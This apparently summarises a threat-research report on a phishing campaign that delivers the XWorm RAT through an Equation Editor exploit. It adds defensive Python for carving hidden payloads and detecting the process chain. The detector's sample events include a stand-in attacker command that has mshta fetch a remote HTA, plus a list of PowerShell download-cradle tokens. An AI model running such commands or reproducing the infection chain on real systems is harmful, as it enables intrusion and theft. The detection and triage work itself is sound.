FortiGuard Labs has uncovered a sophisticated phishing campaign delivering XWorm version 7.2, a multi-functional Remote Access Trojan (RAT) that provides attackers with full remote control of compromised Windows systems.
Campaign Overview
The campaign utilizes multiple phishing email themes written in various languages to maximize its reach. Emails are disguised as:
- Payment detail requests requiring recipient review
- Purchase orders requesting acknowledgment
- Signed bank documents related to shipments
- Other business-related communications
All phishing emails carry an attached Excel add-in file (.XLAM) and instruct recipients to open the attachment for additional details.
Exploitation of CVE-2018-0802
The malicious Excel files contain an embedded OLE (Object Linking and Embedding) object configured to auto-load. This object exploits CVE-2018-0802, a remote code execution vulnerability in Microsoft Equation Editor (EQNEDT32.EXE) that remains actively exploited despite being discovered years ago.
When the Excel file is opened, EQNEDT32.EXE parses the malformed OLE object, triggering the vulnerability and executing embedded shellcode.
Sophisticated Infection Chain
The attack follows a multi-stage infection process:
- Initial Access: Shellcode downloads an HTA file from the attacker’s infrastructure
- HTA Execution: The HTA file triggers obfuscated JScript code that launches PowerShell
- Fileless Module: PowerShell downloads a JPEG file containing a hidden .NET module between “BaseStart” and “BaseEnd” markers
- Memory-Only Loading: The .NET module is extracted and loaded directly into memory without writing to disk
- Process Hollowing: The module creates a suspended Msbuild.exe process and injects the XWorm payload using process hollowing techniques
The choice of Msbuild.exe as the injection target is deliberate: because it is a .NET-compiled executable, it initializes the runtime environment that the .NET-based XWorm RAT needs in order to execute.
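The following Python script is an added example for triaging the JPEG stage described above; it is not FortiGuard's code and is not taken from the report. It carves every byte run between the "BaseStart" and "BaseEnd" markers the page names and checks whether each run is a PE image, either directly or after base64 decoding (the report does not say whether the hidden module is stored raw, so the decoding fallback is an assumption). The sample image bytes and the stub PE header are constructed inside the script.

```python
import base64
import struct

# Markers that the report says delimit the hidden .NET module inside the downloaded JPEG.
START_MARKER = b"BaseStart"
END_MARKER = b"BaseEnd"


def carve_between_markers(blob, start=START_MARKER, end=END_MARKER):
    """Return every byte run enclosed by a start/end marker pair, in file order."""
    runs = []
    pos = 0
    while True:
        s = blob.find(start, pos)
        if s == -1:
            break
        s += len(start)
        e = blob.find(end, s)
        if e == -1:           # unterminated run: nothing usable after this point
            break
        runs.append(blob[s:e])
        pos = e + len(end)
    return runs


def looks_like_pe(data):
    """Cheap PE sanity check: 'MZ' at offset 0 and e_lfanew pointing at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def normalise_payload(data):
    """Return the run as a PE if it is one directly or after base64 decoding, else unchanged.
    Assumption: the report does not state whether the module is stored raw or encoded."""
    if looks_like_pe(data):
        return data
    try:
        decoded = base64.b64decode(data, validate=True)
    except ValueError:        # binascii.Error is a ValueError subclass
        return data
    return decoded if looks_like_pe(decoded) else data


def triage_image(blob):
    """Summarise whether an image file carries marker-delimited runs and how many are PE images."""
    payloads = [normalise_payload(run) for run in carve_between_markers(blob)]
    return {
        "is_jpeg": blob[:2] == b"\xff\xd8",
        "payload_count": len(payloads),
        "pe_payloads": sum(1 for p in payloads if looks_like_pe(p)),
        "payload_sizes": [len(p) for p in payloads],
    }


# --- Constructed sample data (not a real sample from the campaign) -------------
def _fake_pe(size=0x80):
    """Build a minimal stub with a valid MZ/PE header layout for the checks above."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)    # e_lfanew -> 0x40
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


_JPEG_HEAD = b"\xff\xd8\xff\xe0" + bytes(32)   # SOI + APP0 marker, zero-padded
_JPEG_TAIL = b"\xff\xd9"                         # EOI

# Raw module between the markers.
SAMPLE_IMAGE_RAW = _JPEG_HEAD + START_MARKER + _fake_pe() + END_MARKER + _JPEG_TAIL
# Same module base64-encoded between the markers (exercises the decoding fallback).
SAMPLE_IMAGE_B64 = _JPEG_HEAD + START_MARKER + base64.b64encode(_fake_pe()) + END_MARKER + _JPEG_TAIL

if __name__ == "__main__":
    for name, img in (("raw", SAMPLE_IMAGE_RAW), ("base64", SAMPLE_IMAGE_B64)):
        print(name, triage_image(img))
```

To use it on a suspect image, pass the file's bytes to triage_image; a carved run that passes looks_like_pe is the artifact to hand to a sandbox or disassembler. The PE check is deliberately shallow (header layout only); a fuller triage would also confirm a CLR header, since the report describes the hidden module as .NET.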
XWorm 7.2 Capabilities
XWorm, first identified in 2022, remains actively distributed through underground marketplaces including Telegram. Version 7.2 was released in late 2025/early 2026 and includes extensive control capabilities:
- Remote Control: Full system access, command execution, file transfer
- DDoS Attacks: Built-in capability to launch DDoS attacks against specified targets
- Keylogging: Offline keystroke capture stored locally
- Screenshot Capture: Remote screenshot capability
- System Control: Shutdown, restart, and logoff commands
- Hosts File Manipulation: Read and modify the hosts file to block or redirect websites
- Plugin Architecture: Supports 50+ plugins for extended functionality
Encrypted C2 Communications
XWorm protects its command-and-control communications using AES encryption. Upon connection, it sends a registration packet containing detailed victim information including system specs, username, antivirus products, and hardware information—all delimited by the string “<Xwormmm>”.
Defensive Recommendations
- Ensure systems are patched against CVE-2018-0802 and other Equation Editor vulnerabilities
- Block macro-enabled Office documents from untrusted sources
- Monitor for suspicious PowerShell activity and process hollowing behaviors
- Implement email filtering to detect phishing attempts with malicious attachments
- Deploy EDR solutions capable of detecting fileless malware techniques
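As an added example of the monitoring recommended above (not code from the FortiGuard report), the following Python detection logic walks constructed Sysmon-style process-creation records and flags the parent/child relationships the infection chain on this page would produce: Excel spawning EQNEDT32.EXE, Equation Editor spawning any child, mshta.exe (the HTA handler) launching PowerShell, and PowerShell launching Msbuild.exe. The "MSBuild without a project file" heuristic and the PowerShell command-line tokens are my assumptions rather than indicators from the report; the event records, file paths and the placeholder URL are constructed.

```python
from collections import namedtuple

# Constructed process-creation record in the shape of a Sysmon Event ID 1 export (not real telemetry).
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

# Parent -> child pairs the infection chain on this page would produce. "*" matches any child.
SUSPICIOUS_PAIRS = {
    ("excel.exe", "eqnedt32.exe"): "Excel spawned Equation Editor (CVE-2018-0802 exploitation pattern)",
    ("eqnedt32.exe", "*"): "Equation Editor spawned a child process (shellcode execution)",
    ("mshta.exe", "powershell.exe"): "HTA handler launched PowerShell",
    ("powershell.exe", "msbuild.exe"): "PowerShell launched MSBuild (process-hollowing host)",
}

# Assumed heuristics, not indicators taken from the report.
PS_SUSPICIOUS_TOKENS = ("hidden", "-enc", "downloadstring", "downloaddata", "frombase64string")
BUILD_FILE_SUFFIXES = (".proj", ".csproj", ".vbproj", ".sln", ".targets")


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_chain(events):
    """Return one alert per event that matches a chain link or an assumed command-line heuristic."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        child = _basename(e.image)
        reasons = []

        parent = by_pid.get(e.ppid)
        if parent is not None:
            p = _basename(parent.image)
            reason = SUSPICIOUS_PAIRS.get((p, child)) or SUSPICIOUS_PAIRS.get((p, "*"))
            if reason:
                reasons.append(reason)

        if child == "msbuild.exe":
            tokens = e.cmdline.lower().split()
            if not any(tok.endswith(BUILD_FILE_SUFFIXES) for tok in tokens):
                reasons.append("MSBuild started without a project file (assumed hollowing indicator)")

        if child == "powershell.exe":
            low = e.cmdline.lower()
            hits = [t for t in PS_SUSPICIOUS_TOKENS if t in low]
            if hits:
                reasons.append("PowerShell command line contains " + ", ".join(hits))

        if reasons:
            alerts.append({"pid": e.pid, "image": child, "reasons": reasons})
    return alerts


# Constructed events: the chain from this page followed by a benign MSBuild run.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              'EXCEL.EXE "C:\\Users\\user\\Downloads\\payment_details.xlam"'),
    ProcEvent(200, 100, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              "EQNEDT32.EXE -Embedding"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://ATTACKER-HOST-PLACEHOLDER/update.hta"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -nop -w hidden -c "<script body omitted>"'),
    ProcEvent(500, 400, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              "MSBuild.exe"),
    ProcEvent(600, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(700, 600, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              "MSBuild.exe build.proj"),
]

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_EVENTS):
        print(alert)
```

The pair table is the part worth keeping: each entry is one link of the chain the report describes, so a single match is a strong signal even before the command-line heuristics fire. In a real deployment the records would come from Sysmon or EDR process telemetry, and the benign MSBuild run (pid 700) shows why the project-file check is needed to keep build servers quiet.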
Source: FortiGuard Labs Threat Research
